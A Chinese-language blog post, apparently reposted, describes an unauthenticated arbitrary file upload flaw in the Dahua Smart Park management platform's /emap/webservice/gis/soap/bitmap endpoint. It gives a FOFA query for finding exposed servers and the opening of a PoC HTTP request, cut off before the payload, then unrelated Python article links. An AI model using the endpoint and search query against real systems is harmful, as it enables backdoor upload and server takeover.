大华智慧园区综合管理平台 bitmap 任意文件上传漏洞复现
0x01 产品简介
“大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
0x02 漏洞概述
大华智慧园区综合管理平台 /emap/webservice/gis/soap/bitmap接口处存在任意文件上传漏洞,未授权的攻击者可以上传后门文件,执行任意命令,从而控制服务器权限。
0x03 复现环境
FOFA:app=”dahua-智慧园区综合管理平台”
0x04 漏洞复现
PoC
POST /emap/webservice/gis/soap/bitmap HTTP/1.1 Host: your-ip Content-Typ
本文来自网络,不代表协通编程立场,如若转载,请注明出处:https://www.net2asp.com/cf671a1dd6.html
相关推荐
-
基于Python的H5手机移动商城(Django框架)开题答辩常规问题和如何回答(答辩指导)
博主介绍:黄菊华老师《Vue.js入门与商城开发实战》《微信小程序商城开发》图书作者,CSDN博客专家,在线教育专家,CSDN钻石讲师;专注大学生毕业设计教育和辅导。 所有项目都…
-
100天精通Python(数据分析篇)——第72天:Pandas文本数据处理方法之判断类型、去除空白字符、拆分和连接
文章目录 每篇前言 一、Python字符串内置方法 1. 判断类型 2. 去除空白字符 3. 拆分和连接 二、Pandas判断类型 1. str.isspace() 2. str….
-
【Python】Python时间戳( timestamp)
from datetime import datetime “””Python日期时间到时间戳””” # 当前日期和时间 now = datetime.now() timestam…
-
【你评论,我送书】Python的爬虫基础知识
目录 赠书地区 本期赠书: 前言/序言 本书内容简介 获得赠书
-
解决CUDA 11.6版本对应的tensorflow-gpu版本问题
个人电脑相关配置版本信息 (超级超级新的版本,以至于适配方面花了很长时间来搞) cuda 11.6 cudnn 8.9.0 python 3.10 对应安装的gpu版本 te…
-
Python中的pyarrow入门
目录 Python中的pyarrow入门 简介 安装 基本操作 创建和访问数组 读写文件 转换数据类型 处理大型数据集 高级操作 结论 实际应用场景示例:数据分析和可视化 PyAr…
-
YOLOv5入门实践(4)——手把手教你训练自己的数据集
前言 在上一篇文章中我们介绍了如何划分数据集,划分好之后我们的前期准备工作就已经全部完成了,下面开始训练自己的数据集吧! 前期回顾: YOLOv5入门实践(1)——手把手带你环…
-
Python 算法基础篇:深度优先搜索( DFS )和广度优先搜索( BFS )
Python 算法基础篇:深度优先搜索( DFS )和广度优先搜索( BFS ) 引言 1. 深度优先搜索( DFS )算法概述 2. 深度优先搜索( DFS )算法实现 实例1:…
-
Python 中错误 ModuleNotFoundError: No Module Named Configparser
ModuleNotFoundError 是使用一些需要导入当前程序的内置功能、类、库和包时最常见的错误之一。 大多数情况下,您需要使用 import 关键字将这些内置功能导入到您当…
-
21.3 Python 使用DPKT分析数据包
dpkt项目是一个Python模块,主要用于对网络数据包进行解析和操作。它可以处理多种协议,例如TCP、UDP、IP等,并提供了一些常用的网络操作功能,例如计算校验和、解析DNS数…
